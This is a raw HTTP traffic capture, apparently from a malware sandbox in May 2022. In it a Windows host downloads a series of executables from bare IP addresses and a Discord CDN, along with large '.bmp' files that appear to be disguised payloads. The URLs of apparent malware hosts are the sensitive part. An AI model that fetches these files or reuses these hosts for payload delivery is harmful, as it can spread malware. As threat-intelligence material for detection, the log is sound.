HTTP/1.1 404 Not Found
Date: Thu, 26 May 2022 02:10:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1

212.193.30.29:80

GET /WW/file1.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 212.193.30.29
Cache-Control: no-cache

HTTP/1.1 404 Not Found
Date: Thu, 26 May 2022 02:10:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 275
Content-Type: text/html; charset=iso-8859-1

193.106.191.190:80

HEAD /SetupMEXX.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 193.106.191.190
Content-Length: 0
Cache-Control: no-cache

HTTP/1.1 403 Forbidden
Date: Thu, 26 May 2022 02:10:25 GMT
Server: Apache/2.4.25 (Debian)
Content-Type: text/html; charset=iso-8859-1

193.106.191.190:80

GET /SetupMEXX.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 193.106.191.190
Cache-Control: no-cache

HTTP/1.1 403 Forbidden
Date: Thu, 26 May 2022 02:10:25 GMT
Server: Apache/2.4.25 (Debian)
Content-Length: 280
Content-Type: text/html; charset=iso-8859-1

212.193.30.29:80

HEAD /WW/file3.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 212.193.30.29
Content-Length: 0
Cache-Control: no-cache

HTTP/1.1 404 Not Found
Date: Thu, 26 May 2022 02:10:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1

212.193.30.29:80

HEAD /WW/file2.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 212.193.30.29
Content-Length: 0
Cache-Control: no-cache

HTTP/1.1 404 Not Found
Date: Thu, 26 May 2022 02:10:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1

192.241.154.249:80

HEAD /var.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 192.241.154.249
Content-Length: 0
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 26 May 2022 02:10:25 GMT
Content-Type: application/octet-stream
Content-Length: 4222464
Last-Modified: Wed, 25 May 2022 22:43:22 GMT
Connection: keep-alive
ETag: "628eb10a-406e00"
Accept-Ranges: bytes

192.241.154.249:80

GET /var.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 192.241.154.249
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 26 May 2022 02:10:25 GMT
Content-Type: application/octet-stream
Content-Length: 4222464
Last-Modified: Wed, 25 May 2022 22:43:22 GMT
Connection: keep-alive
ETag: "628eb10a-406e00"
Accept-Ranges: bytes

86.106.131.132:80

HEAD /polx.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 86.106.131.132
Content-Length: 0
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Thu, 26 May 2022 02:10:25 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Wed, 25 May 2022 16:28:20 GMT
ETag: "219e00-5dfd88fb3b944"
Accept-Ranges: bytes
Content-Length: 2203136
Content-Type: application/x-msdos-program

86.106.131.132:80

GET /polx.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 86.106.131.132
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Thu, 26 May 2022 02:10:25 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Wed, 25 May 2022 16:28:20 GMT
ETag: "219e00-5dfd88fb3b944"
Accept-Ranges: bytes
Content-Length: 2203136
Content-Type: application/x-msdos-program

175.126.109.15:80

GET /vento/6523.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: colgefine.at
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/1.20.2
Date: Thu, 26 May 2022 02:10:27 GMT
Content-Type: application/octet-stream
Content-Length: 280576
Last-Modified: Thu, 26 May 2022 02:00:01 GMT
Connection: close
ETag: "628edf21-44800"
Accept-Ranges: bytes

212.193.30.29:80

GET /WW/file2.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 212.193.30.29
Cache-Control: no-cache

HTTP/1.1 404 Not Found
Date: Thu, 26 May 2022 02:10:46 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 275
Content-Type: text/html; charset=iso-8859-1

212.193.30.29:80

GET /WW/file5.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 212.193.30.29
Cache-Control: no-cache

HTTP/1.1 404 Not Found
Date: Thu, 26 May 2022 02:10:46 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 275
Content-Type: text/html; charset=iso-8859-1

212.193.30.29:80

GET /WW/file4.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 212.193.30.29
Cache-Control: no-cache

HTTP/1.1 404 Not Found
Date: Thu, 26 May 2022 02:10:46 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 275
Content-Type: text/html; charset=iso-8859-1

212.193.30.29:80

GET /WW/file3.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 212.193.30.29
Cache-Control: no-cache

HTTP/1.1 404 Not Found
Date: Thu, 26 May 2022 02:10:46 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 275
Content-Type: text/html; charset=iso-8859-1

162.159.133.233:443

GET /attachments/976481542438264835/978953029841747968/AfFqfqY.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: cdn.discordapp.com
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Thu, 26 May 2022 02:10:46 GMT
Content-Type: application/x-msdos-program
Content-Length: 955392
Connection: keep-alive
CF-Ray: 7112f9f2cbea96fb-AMS
Accept-Ranges: bytes
Age: 52328
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=AfFqfqY.exe
ETag: "401a88fa4f93e8c11d82813dd08f232c"
Expires: Fri, 26 May 2023 02:10:46 GMT
Last-Modified: Wed, 25 May 2022 09:29:50 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1653470990432388
x-goog-hash: crc32c=yN/0qA==
x-goog-hash: md5=QBqI+k+T6MEdgoE90I8jLA==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 955392
X-GUploader-UploadID: ADPycduOzrNhuj7E0JoPif8KjWsnCOGlRJkAPx_XecRFCcAcrs1nWnLxhHGtgN942Vv0-IBtcOvkthi3TRINQK0BGY0MW6TSw_tE
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FDn5BHIjrZrXD0t9Wa0uJl00jhSJQi9FxDcO3f4IZyheDbyWh%2BgJLUinv1CKBCXqd6av66aSANdI%2F8qa33r31DCJ9oqCGbqTNxVHmfxORARWRH5YE%2BmE6DHK%2Bfb3C3N9d%2BdrFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare

162.159.133.233:443

GET /attachments/978284851323088960/978990356580409444/Fenix_15.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: cdn.discordapp.com
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Thu, 26 May 2022 02:10:46 GMT
Content-Type: image/x-ms-bmp
Content-Length: 3522244
Connection: keep-alive
CF-Ray: 7112f9f2dc5d970b-AMS
Accept-Ranges: bytes
Age: 50988
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=Fenix_15.bmp
ETag: "d3283d5840e2890979685b99828d5a87"
Expires: Fri, 26 May 2023 02:10:46 GMT
Last-Modified: Wed, 25 May 2022 11:58:09 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1653479889925549
x-goog-hash: crc32c=Hfqh4A==
x-goog-hash: md5=0yg9WEDiiQl5aFuZgo1ahw==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 3522244
X-GUploader-UploadID: ADPycdvtviAILaWK6N2SG2wx4Wl5E0wqkdv6DfuGy8EG-fVZdD45dk_DUedW2BLy90JhnblPcHM27EfqXiuBVB3DvJLa8IocyxEq
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FFhTYfAh2XtoXRrH4Pf2ZNLQrzeSoziwRhcSp5yIOgJ1cBKZm6jtoQdMBkfw7l33LUHw3O3pixUvcyZes%2BPfaiNXa%2BnCsW1H0saWozQkPEKtAfsVGBLG4uCeLx75xDvZ5mrmuQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare

162.159.133.233:443

GET /attachments/978284851323088960/978339474847174686/Mixinte23.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: cdn.discordapp.com
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Thu, 26 May 2022 02:11:11 GMT
Content-Type: image/x-ms-bmp
Content-Length: 371204
Connection: keep-alive
CF-Ray: 7112fa8cfe9a00bf-AMS
Accept-Ranges: bytes
Age: 206312
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=Mixinte23.bmp
ETag: "74774e3c4ef11a34b1de037877859a12"
Expires: Fri, 26 May 2023 02:11:11 GMT
Last-Modified: Mon, 23 May 2022 16:51:47 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1653324707517813
x-goog-hash: crc32c=08Varw==
x-goog-hash: md5=dHdOPE7xGjSx3gN4d4WaEg==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 371204
X-GUploader-UploadID: ADPycdskbiAwmM05uTXiDkpITwyeABYzunCZyc9bG9_-nwjCvwtdM0To_NOepXOefmXFla-_LrB7v_NBh3Ih2jPGXCMElXEUkP8j
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3ylr71XBw5oyqIM23spYNzhfGjqIRPIcgAPy3TKaKzjCCxZ8oxJTRXl2cEMePBVasTC2GhrTfqVVjY4M80jTM6ktCyM%2BbndmI8A%2F3l%2B2ddLUty3Df4jGqi6OZNWgHGOuJ7cBdw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare

162.159.133.233:443

GET /attachments/978284851323088960/978650107136327760/build2kEu.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: cdn.discordapp.com
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Thu, 26 May 2022 02:11:11 GMT
Content-Type: image/x-ms-bmp
Content-Length: 2719236
Connection: keep-alive
CF-Ray: 7112fa8cfaf4975d-AMS
Accept-Ranges: bytes
Age: 132151
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=build2kEu.bmp
ETag: "ceaa92c8d722921c1540b1be2cf2303d"
Expires: Fri, 26 May 2023 02:11:11 GMT
Last-Modified: Tue, 24 May 2022 13:26:08 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1653398768099297
x-goog-hash: crc32c=HRYfhg==
x-goog-hash: md5=zqqSyNcikhwVQLG+LPIwPQ==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 2719236
X-GUploader-UploadID: ADPycdvNAkCIgOa5Yjr3MCIWaiRZyWCMyrm6uzd6PJEZDi6ixNm1O3vmsaUe3Bc9KkNAzKTK94xdOS2en-Lwc0lR636hyXoWVxJD
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SO19%2FNeH9OHxa8bWwUb0u2SS2Fjk0wFzG0KX9EwxNug8m0nWb5fEWLEW%2FCGrU0ZETicV5DnhD9s5COODXLp62e1dRyqe8M5ryXSWWuRHRaQCX%2B9zr20eHukqsxwIGN5aF10NAw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare

8.8.8.8:53